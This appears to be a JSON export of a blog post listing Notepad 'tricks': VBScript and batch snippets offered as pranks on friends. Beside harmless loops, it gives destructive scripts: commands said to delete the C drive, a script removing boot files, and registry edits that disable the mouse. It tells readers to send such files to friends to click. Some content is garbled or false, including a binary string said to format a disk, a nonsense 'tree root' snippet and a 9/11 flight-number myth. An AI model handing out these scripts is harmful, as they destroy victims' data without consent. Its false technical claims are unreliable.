{"id":10748,"date":"2017-05-15T15:28:48","date_gmt":"2017-05-15T09:58:48","guid":{"rendered":"https:\/\/www.wikitechy.com\/technology\/?p=10748"},"modified":"2018-10-30T23:55:20","modified_gmt":"2018-10-30T18:25:20","slug":"best-notepad-tricks-hacks-2017","status":"publish","type":"post","link":"https:\/\/www.wikitechy.com\/technology\/best-notepad-tricks-hacks-2017\/","title":{"rendered":"Best Notepad Tricks &#038; Hacks 2017"},"content":{"rendered":"<h2 id=\"notepad-tricks-2016\"><strong>\u00a0<span style=\"color: #ff6600;\">Notepad Tricks 2016<\/span><\/strong><\/h2>\n<p>All <a href=\"https:\/\/www.wikitechy.com\/technology\/best-alternatives-notepad-mac-os-x\/\">notepad<\/a> coding hacks and tricks for PC to trick with friends for no particular reason. Today i am going to impart information of how we trick to our friend utilizing these most recent notepad tricks. In this Post i will tell to you the <a href=\"https:\/\/www.wikitechy.com\/technology\/using-uptime-long-linux-system-running\/\">procedures<\/a> of tricks in notepad. These tricks are exceptionally interesting and through this you can likewise control the working of the framework. A hefty portion of us utilize notepad just to type reason however this post will change your involvement with notepad.<\/p>\n[ad type=&#8221;banner&#8221;]\n<h3 id=\"latest-notepad-tricks-2016\"><span style=\"color: #800000;\"><strong>Latest Notepad Tricks 2016<\/strong><\/span><\/h3>\n<p>Here are the\u00a0<strong>latest notepad tricks<\/strong>\u00a0which are most useful in creating a funny prank with friends.<\/p>\n<h3 id=\"100-working-notepad-tricks\"><span style=\"color: #339966;\"><strong>{100% Working}: Notepad Tricks<\/strong><\/span><\/h3>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter  wp-image-31744\" src=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/05\/Best-Notepad-Tricks-Hacks-2017.jpg\" alt=\"\" width=\"613\" height=\"327\" srcset=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/05\/Best-Notepad-Tricks-Hacks-2017.jpg 656w, https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/05\/Best-Notepad-Tricks-Hacks-2017-300x160.jpg 300w\" sizes=\"(max-width: 613px) 100vw, 613px\" \/><\/p>\n<h2 id=\"step-1-create-a-harmless-funny-virus-with-notepad-that-continuously-eject-cd-dvd-drives\"><strong><label class=\"label label-success\">Step 1:<\/label><\/strong> <span style=\"color: #ff0000;\"><strong>Create a Harmless Funny Virus with Notepad That Continuously eject CD\/DVD drives<\/strong><\/span><\/h2>\n<p>Make a <a href=\"https:\/\/www.wikitechy.com\/technology\/ransomware-malware-everything-need-know\/\">Harmless<\/a> Funny Virus with Notepad That Continuously launch CD\/DVD drives. This trick will make a code which will continuously launch all your associated Optical drives. In the event that you set them back in, it will pop them out once more. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.<\/p>\n<blockquote><p>Set oWMP = CreateObject(\u201cWMPlayer.OCX.7\u2033)<\/p>\n<p>Set colCDROMs = oWMP.cdromCollection<\/p>\n<p>do<\/p>\n<p>if colCDROMs.Count &gt;= 1 then<\/p>\n<p>For i = 0 to colCDROMs.Count \u2013 1<\/p>\n<p>colCDROMs.Item(i). Eject<\/p>\n<p>Next<\/p>\n<p>For i = 0 to colCDROMs.Count \u2013 1<\/p>\n<p>colCDROMs.Item(i). Eject<\/p>\n<p>Next<\/p>\n<p>End If<\/p>\n<p>wscript. sleep 5000<\/p>\n<p>loop<\/p><\/blockquote>\n<p>Double click on saved file and see the magic<\/p>\n<p>(You can stop this by ending the process wscript in task manager)<\/p>\n<h2 id=\"step-2-make-your-keyboard-type-any-message-continuously\"><span style=\"color: #000000;\"><strong><label class=\"label label-success\">Step 2<\/label><\/strong>\u00a0:<span style=\"color: #0000ff;\"><strong>Make Your Keyboard Type (Any) Message Continuously<\/strong><\/span><\/span><\/h2>\n<p>This trick can make any of your friend\u2019s keyboard type any <a href=\"https:\/\/www.wikitechy.com\/technology\/add-login-message-mac-using-terminal-system-preferences\/\">message<\/a> continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs.<\/p>\n<blockquote><p>Set wshShell = wscript. CreateObject (\u201cWScript.Shell\u201d)<\/p>\n<p>do<\/p>\n<p>wscript. sleep 100<\/p>\n<p>wshShell. send keys \u201cThis is a Virus. You have been infected.\u201d<\/p>\n<p>Loop<\/p><\/blockquote>\n<p>how to stop this\u2013 You will need to restart your computer to stop this. Try this after closing all important programs.<\/p>\n[ad type=&#8221;banner&#8221;]\n<h2 id=\"step-3-formatting-c-drive\"><strong><label class=\"label label-success\">Step 3:<\/label><span style=\"color: #008000;\"> Formatting C drive<\/span><\/strong><\/h2>\n<p>Open notepad and paste this code. This Will Format Your C Drive<\/p>\n<blockquote><p>@Echo off<br \/>\nDel C: *. * |y<\/p><\/blockquote>\n<h2 id=\"step-4-what-you-type-your-pc-will-speak\"><strong><label class=\"label label-success\">Step 4<\/label>\u00a0:<span style=\"color: #ffcc00;\">What you type Your PC will Speak<\/span><\/strong><\/h2>\n<p>In this trick, I will show you that how to make a simple program that will talk what you type. By utilizing this deceive, you will make an extremely simple program that will talk whatever you write in the given box. Thus, take after the below given steps to get begin.<\/p>\n<ul>\n<li>First of all, open<em>Notepad<\/em><\/li>\n<li>Then paste the below given code in<em>Notepad<\/em><\/li>\n<\/ul>\n<blockquote><p><em>Dim message, sapi<\/em><\/p>\n<p><em>message=InputBox (\u201cWhat do you want me to say?\u201d,\u201d ATT Text to Speak\u201d)<\/em><\/p>\n<p><em>Set sapi=CreateObject (\u201csapi. spvoice\u201d)<\/em><\/p>\n<p><em>sapi. Speak message<\/em><\/p><\/blockquote>\n<ul>\n<li>Now, <a href=\"https:\/\/www.wikitechy.com\/technology\/add-screensaver-mac\/\">save<\/a> this file as<em>vbs<\/em><\/li>\n<li>Now, open it and then you will see a very simple program, in which you have to type anything you want and hit<em>OK<\/em>\u00a0button to speak your computer<\/li>\n<\/ul>\n[ad type=&#8221;banner&#8221;]\n<h2 id=\"step-5-matrix-effect\"><strong><label class=\"label label-success\">Step 5:<\/label> <\/strong> <span style=\"color: #993366;\"><strong>Matrix Effect<\/strong><\/span><\/h2>\n<p>This is one of the best trick for all the fans of the <a href=\"https:\/\/www.wikitechy.com\/technology\/c-programming-given-matrix-o-x-find-largest-subsquare-surrounded-x\/\">Matrix<\/a> movies<strong>.<\/strong>\u00a0By using this trick you can create a matrix like effect in your Notepad. So, follow the steps to get started.<\/p>\n<ul>\n<li>Firstly, open<em>Notepad<\/em><\/li>\n<li>Now, paste the given code in<em>Notepad<\/em><\/li>\n<\/ul>\n<blockquote><p><em>@echo off<\/em><\/p>\n<p><em>color 02<\/em><\/p>\n<p><em>: start<\/em><\/p>\n<p><em>echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%<\/em><\/p>\n<p><em>goto start<\/em><\/p><\/blockquote>\n<ul>\n<li>After, save this file as<em>bat<\/em><\/li>\n<li>Then open it and see effect.<\/li>\n<\/ul>\n<h2 id=\"step-6-format-hard-disk-using-just-notepad\"><span id=\"8Format_Hard_Disk_Using_Just_Notepad\"><strong>Step 6: <span style=\"color: #993300;\">Format Hard Disk Using Just Notepad<\/span><\/strong><\/span><\/h2>\n<p>This code will delete all your hard drive data. Just copy the below code and paste in notepad and save it as \u201canyname.exe\u201d.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000<\/strong><\/p><\/blockquote>\n<h2 id=\"step-7-convert-text-into-audio-using-notepad\"><span id=\"9Convert_Text_Into_Audio_Using_Notepad\"><strong>Step 7: <span style=\"color: #99cc00;\">Convert Text Into Audio Using Notepad<\/span><\/strong><\/span><\/h2>\n<p>This is very cool notepad trick and this code will convert your text into an audio file. Just copy the below code and paste it into notepad and save it as \u201ctext-to-audio.vbs\u201d<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>Dim message, sapi message=InputBox(\u201cEnter your text for conversion\u2013Tech-hacks.org\u201d,\u201dHover pc Hacks Text-To-Audio Converter\u201d) Set sapi=CreateObject(\u201csapi.spvoice\u201d) sapi.Speak message<\/strong><\/p><\/blockquote>\n<h2 id=\"step-8-notepad-trick-print-tree-root\"><span id=\"10Notepad_Trick_Print_Tree_Root\"><strong>Step 8:\u00a0 <span style=\"color: #33cccc;\">Notepad Trick Print Tree Root<\/span><\/strong><\/span><\/h2>\n<p>This trick is one of the Best Notepad Trick that will print out a tree root on your screen. Just copy below code, paste it into notepad and save it as teekids in C:windows system.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>{print tree root}<\/strong><\/p>\n<p><strong>C:windowssystem<\/strong><\/p>\n<p><strong>{print C:windowssystemwinlog<\/strong><\/p>\n<p><strong>4*43\u2033$@[455] 3hr4~<\/strong><\/p><\/blockquote>\n<p>Note:\u00a0If you want to stop the \u201c.vbs\u201d files press ALT+CTRL+DEL of your keyboard and open task manager and then process section and stop the Wscript running file there.<\/p>\n<h2 id=\"step-9-toggle-your-capslock\"><span id=\"11_Toggle_Your_Capslock\"><strong>Step 9 : <span style=\"color: #ff00ff;\">Toggle Your Capslock<\/span><\/strong><\/span><\/h2>\n<p>You can <a href=\"https:\/\/www.wikitechy.com\/technology\/modify-keyboard-settings-google-chromebooks\/\">toggle<\/a> the Capslock key of your keyboard by just typing the code in the Notepad. Make sure to save the file as .vbs and open the saved file and see what happens while using Capslock Key.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>Set wshShell =wscript.CreateObject(\u201cWScript.Shell\u201d)<\/strong><br \/>\n<strong>do<\/strong><br \/>\n<strong>wscript.sleep 100<\/strong><br \/>\n<strong>wshshell.sendkeys \u201c{CAPSLOCK}\u201d<\/strong><br \/>\n<strong>loop<\/strong><\/p><\/blockquote>\n<h2 id=\"step-10-fake-error-message\"><span id=\"12_Fake_Error_Message\"><strong>Step 10:\u00a0 <span style=\"color: #ff9900;\">Fake Error Message<\/span><\/strong><\/span><\/h2>\n<p>Simply open the notepad paste the code and save the file as error.vbs. Now when you will open the saved file you will see an error message.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>X=Msgbox(\u201cPut your Message Here\u201d,0+16,\u201dPut Title Here\u201d)<\/strong><\/p><\/blockquote>\n<p>You can replace and put your message here and put your title here with your keywords.<\/p>\n<h2 id=\"step-11-led-dance-of-keyboard-using-notepad\"><span id=\"13_LED_Dance_of_Keyboard_Using_Notepad\"><strong>Step 11:\u00a0 <span style=\"color: #00ff00;\">LED Dance of Keyboard Using Notepad<\/span><\/strong><\/span><\/h2>\n<p>Simply open Notepad and enter the following code and save the file as \u201cLEDDance.vbs\u201d . Once you open the saved file, you will see all three LED lights of a keyboard will start to blink repeatedly.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>Set wshShell =wscript.CreateObject(\u201cWScript.Shell\u201d)<\/strong><br \/>\n<strong>do<\/strong><br \/>\n<strong>wscript.sleep 100<\/strong><br \/>\n<strong>wshshell.sendkeys \u201c{CAPSLOCK}\u201d<\/strong><br \/>\n<strong>wshshell.sendkeys \u201c{NUMLOCK}\u201d<\/strong><br \/>\n<strong>wshshell.sendkeys \u201c{SCROLLLOCK}\u201d<\/strong><br \/>\n<strong>loop<\/strong><\/p><\/blockquote>\n<h2 id=\"step-12-create-a-password-protected-file-using-notepad\"><span id=\"14Create_a_Password_Protected_File_Using_Notepad\"><strong>Step 12: <span style=\"color: #666699;\">Create a Password Protected File Using Notepad<\/span><\/strong><\/span><\/h2>\n<p>We have published an article regarding this. With the help of our article\u00a0How to Create a <a href=\"https:\/\/www.wikitechy.com\/technology\/remove-windows-password\/\">Password<\/a> Protected Folder Without any Software, you can create a folder which is password protected using notepad.<\/p>\n<h2 id=\"step-13-open-notepad-continuously\"><span id=\"15_Open_Notepad_Continuously\"><strong>Step 13:\u00a0 <span style=\"color: #00ccff;\">Open Notepad Continuously<\/span><\/strong><\/span><\/h2>\n<p>This is the perfect prank to annoy your friend. You just need to copy and paste the code inside the notepad and save it with any name with .bat extension. You can send it to you friend and make him\/her click.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>@ECHO OFF<\/strong><\/p>\n<p><strong>:TOP<\/strong><\/p>\n<p><strong>START %SYSTEMROOT%\\SYSTEM32\\NOTEPAD.EXE<\/strong><\/p>\n<p><strong>GOTO TOP<\/strong><\/p><\/blockquote>\n<h2 id=\"step-14-world-trade-center-attack-trick\"><span id=\"16_World_Trade_Center_Attack_Trick\"><strong>Step 14: <span style=\"color: #000080;\">World Trade Center Attack Trick<\/span><\/strong><\/span><\/h2>\n<p>The flight number of the airplane that had hit World Trade center on 9\/11 was Q33NY. Well, you might call this trick coincidence but, it will shock you.<\/p>\n<p><strong>\u00a01.<\/strong>\u00a0Open Notepad and type<strong>\u00a0\u2018Q33N\u2019<\/strong>\u00a0without the quotation mark in capital letters.<\/p>\n<p><strong>\u00a02.<\/strong>\u00a0Now increase the font size to\u00a0<strong>72<\/strong>\u00a0and change the font to\u00a0<strong>Wingding<\/strong>s.<\/p>\n<p>You will be shocked to find out the <a href=\"https:\/\/www.wikitechy.com\/technology\/tfs-2012-check-error-value-either-large-small-uint32\/\">visual<\/a> graphics.<\/p>\n<h2 id=\"step-15-disable-mouse-controls\"><span id=\"17_Disable_Mouse_Controls\"><strong>Step 15 :<span style=\"color: #993366;\"> Disable Mouse Controls<\/span><\/strong><\/span><\/h2>\n<p>Well, you should never try this on your computer, because this method disables the mouse controls on your computer.<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>rem Disable Mouse<\/strong><br \/>\n<strong>set key=\u201dHKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Services\\Mouclass\u201d<\/strong><br \/>\n<strong>reg delete %key%<\/strong><br \/>\n<strong>reg add %key% \/v Start \/t REG_DWORD \/d 4<\/strong><\/p><\/blockquote>\n<p>Paste the above code in notepad and save it as disablemouse.bat in your computer.<\/p>\n<h2 id=\"step-16-bush-hid-the-facts\"><span id=\"18_Bush_Hid_The_Facts\"><strong>Step 16: <span style=\"color: #008080;\">Bush Hid The Facts<\/span><\/strong><\/span><\/h2>\n<p>Well, this trick will only work on older version of windows. You just need to open the Notepad and type<strong>\u00a0\u201cbush hid the facts\u201d<\/strong>\u00a0or\u00a0<strong>\u201cthis app can break\u201d<\/strong>. Save it and open it again. You will see different characters instead of what you typed. Well, this happens because of a bug that is present in older version of windows.<\/p>\n<h3 id=\"19-changing-the-header-and-footer-in-notepad\"><span id=\"19_Changing_The_Header_And_Footer_In_Notepad\"><strong>#19 Changing The Header And Footer In Notepad<\/strong><\/span><\/h3>\n<p>Well, just open the notepad and then browse to\u00a0<strong>File&gt;Page Setup<\/strong>\u00a0in Notepad and there in the fields for header and footer type in the following codes.<\/p>\n<figure id=\"attachment_55478\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad.png\" data-wpel-link=\"internal\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" class=\"size-full wp-image-55478 td-animation-stack-type0-2 lazyloaded\" src=\"https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad.png\" sizes=\"(max-width: 636px) 100vw, 636px\" srcset=\"https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad.png 636w, https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad-300x193.png 300w\" alt=\"Changing The Header And Footer In Note\" width=\"636\" height=\"410\" data-lazy-src=\"https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad.png\" data-lazy-srcset=\"https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad.png 636w, https:\/\/techviral.net\/wp-content\/uploads\/2016\/09\/Notepad-300x193.png 300w\" data-lazy-sizes=\"(max-width: 636px) 100vw, 636px\" data-was-processed=\"true\" \/><\/a><figcaption class=\"wp-caption-text\">Changing The Header And Footer In Note<\/figcaption><\/figure>\n<p>&amp;c Center the characters that follow<br \/>\n&amp;r Right-align the characters that follow<br \/>\n&amp;d Print the current date<br \/>\n&amp;t Print the current time<br \/>\n&amp;f Print the name of the document<br \/>\n&amp;p Print the page number<br \/>\n&amp;l Left-align the characters that follow<\/p>\n<h2 id=\"step-17-hit-enter-continuously\"><span id=\"20_Hit_Enter_Continuously\"><strong>Step 17: <span style=\"color: #008000;\">Hit Enter Continuously<\/span><\/strong><\/span><\/h2>\n<p>This trick will let you use the function of the enter button happen again and again. Well, you just need to copy and paste the following code into the notepad:<\/p>\n<blockquote class=\"td_quote_box td_box_center\"><p><strong>Set wshShell = wscript.CreateObject(\u201cWScript.Shell\u201d)<\/strong><br \/>\n<strong>do<\/strong><br \/>\n<strong>wscript.sleep 100<\/strong><br \/>\n<strong>wshshell.sendkeys \u201c~(enter)\u201d<\/strong><br \/>\n<strong>loop<\/strong><\/p><\/blockquote>\n<p>Save the file as a\u00a0<strong>.vbs<\/strong>\u00a0file format to see the magic.<\/p>\n<h2 id=\"step-18-deleting-startup-files\"><span id=\"21_Deleting_Startup_Files\"><strong>Step 18: <span style=\"color: #808000;\">Deleting Startup Files<\/span><\/strong><\/span><\/h2>\n<p>Well, this is something which you shouldn\u2019t try on your computer unless you are willing to lose all your data. This code will remove the files that help your computer during the startup.<\/p>\n<blockquote><p><strong>@ECHO OFF<\/strong><br \/>\n<strong>ATTRIB -R -S -H C:\\AUTOEXEC.BAT<\/strong><br \/>\n<strong>DEL C:\\AUTOEXEC.BAT<\/strong><br \/>\n<strong>ATTRIB -R -S -H C:\\BOOT.INI<\/strong><br \/>\n<strong>DEL C:\\BOOT.INI<\/strong><br \/>\n<strong>ATTRIB -R -S -H C:\\NTLDR<\/strong><br \/>\n<strong>DEL C:\\NTLDR<\/strong><br \/>\n<strong>ATTRIB -R -S -H C:\\WINDOWS\\WIN.INI<\/strong><br \/>\n<strong>DEL C:\\WINDOWS\\WIN.INI<\/strong><\/p><\/blockquote>\n<p>Save the file as\u00a0<strong>.bat file format<\/strong>. It will shut down your computer and will delete all important <a href=\"https:\/\/www.wikitechy.com\/technology\/back-startup-disk-using-disk-utility\/\">startup<\/a> files. There\u2019s no rollback option. Therefore you should be aware of what you will be doing. Please don\u2019t use the above-given code to harm anyone.<\/p>\n<h2 id=\"step-21-hit-backspace-continuously\"><span id=\"22_Hit_Backspace_Continuously\"><strong>Step 21: <span style=\"color: #993366;\">Hit Backspace Continuously<\/span><\/strong><\/span><\/h2>\n<p>Well, this is one of the funniest things which you can do to annoy anyone. This trick will make hit backspace continuously. You just need to copy and paste the given code below in the notepad file:<\/p>\n<blockquote><p><strong>MsgBox \u201cBackspace again and again and AGAIN\u201d<\/strong><br \/>\n<strong>Set wshShell =wscript.CreateObject(\u201cWScript.Shell\u201d)<\/strong><br \/>\n<strong>do<\/strong><br \/>\n<strong>wscript.sleep 100<\/strong><br \/>\n<strong>wshshell.sendkeys \u201c{bs}\u201d<\/strong><br \/>\n<strong>loop<\/strong><\/p><\/blockquote>\n<div><\/div>\n<p>You need to save the Notepad file in\u00a0<strong>.vbs file format<\/strong>\u00a0to make it work. In order to stop the script, you need to use the Task Manager on Windows.<\/p>\n<p>So above are the Latest\u00a0<strong>Best Notepad Tricks 2018.\u00a0<\/strong>By using these notepad tricks, we can easily prank with your friends and have lots of fun with them and have a great experience with the notepad.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Best Notepad Tricks &#038; Hacks 2017 &#8211; PC &#8211; Today i am going to impart information of how we trick to our friend utilizing these most recent notepad tricks.<\/p>\n","protected":false},"author":2,"featured_media":17958,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5739,51207],"tags":[32155,32143,32148,32158,32181,32182,32146,32137,32171,32162,32178,32180,32175,32142,32174,32177,32139,32151,32164,32186,32147,32153,32149,32184,32185,32183,32173,32138,32169,32160,32166,32170,32140,32165,32161,32167,32163,32168,32172,32141,32145,32156,32152,31628,32159,32157,32154,32150,32179,32144,32176],"class_list":["post-10748","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pc","category-windows","tag-10-notepad-tricks","tag-all-notepad-tricks","tag-amazing-notepad-tricks","tag-awesome-notepad-tricks","tag-bat-hacks","tag-batch-file-hacks","tag-best-notepad-tricks","tag-best-notepad-tricks-hacks-2017","tag-best-notepad-tricks-and-hacks","tag-cmd-notepad-tricks","tag-cmd-tricks-hacks","tag-command-prompt-tricks-hacks-codes","tag-computer-hacks-and-tricks","tag-computer-notepad-tricks","tag-computer-tricks-and-hacks","tag-cool-computer-hacks","tag-cool-notepad-tricks","tag-funny-notepad-tricks","tag-hacking-with-cmd-and-notepad-tricks","tag-how-to-hack-facebook-using-notepad","tag-html-notepad-tricks","tag-microsoft-notepad-tricks","tag-new-notepad-tricks","tag-notepad-codes-for-games","tag-notepad-codes-html","tag-notepad-codes-list","tag-notepad-hacks","tag-notepad-tricks","tag-notepad-tricks-and-hacks","tag-notepad-tricks-and-hacks-pdf","tag-notepad-tricks-and-hacks-windows-7","tag-notepad-tricks-and-tips","tag-notepad-tricks-bat","tag-notepad-tricks-for-hacking","tag-notepad-tricks-for-windows-7","tag-notepad-tricks-for-windows-7-pdf","tag-notepad-tricks-pdf","tag-notepad-tricks-pdf-download","tag-notepad-tricks-sinhala-cmd-and-notepad-tricks-and-hacks","tag-notepad-tricks-vbs","tag-notepad-tricks-windows-7","tag-notepad-tricks-windows-8","tag-pc-notepad-tricks","tag-pc-tricks-and-hacks","tag-top-10-notepad-tricks","tag-top-notepad-tricks","tag-vbs-notepad-tricks","tag-windows-7-notepad-tricks","tag-windows-7-tricks-and-hacks","tag-windows-notepad-tricks","tag-windows-tricks-and-hacks"],"_links":{"self":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts\/10748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/comments?post=10748"}],"version-history":[{"count":0,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts\/10748\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/media\/17958"}],"wp:attachment":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/media?parent=10748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/categories?post=10748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/tags?post=10748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}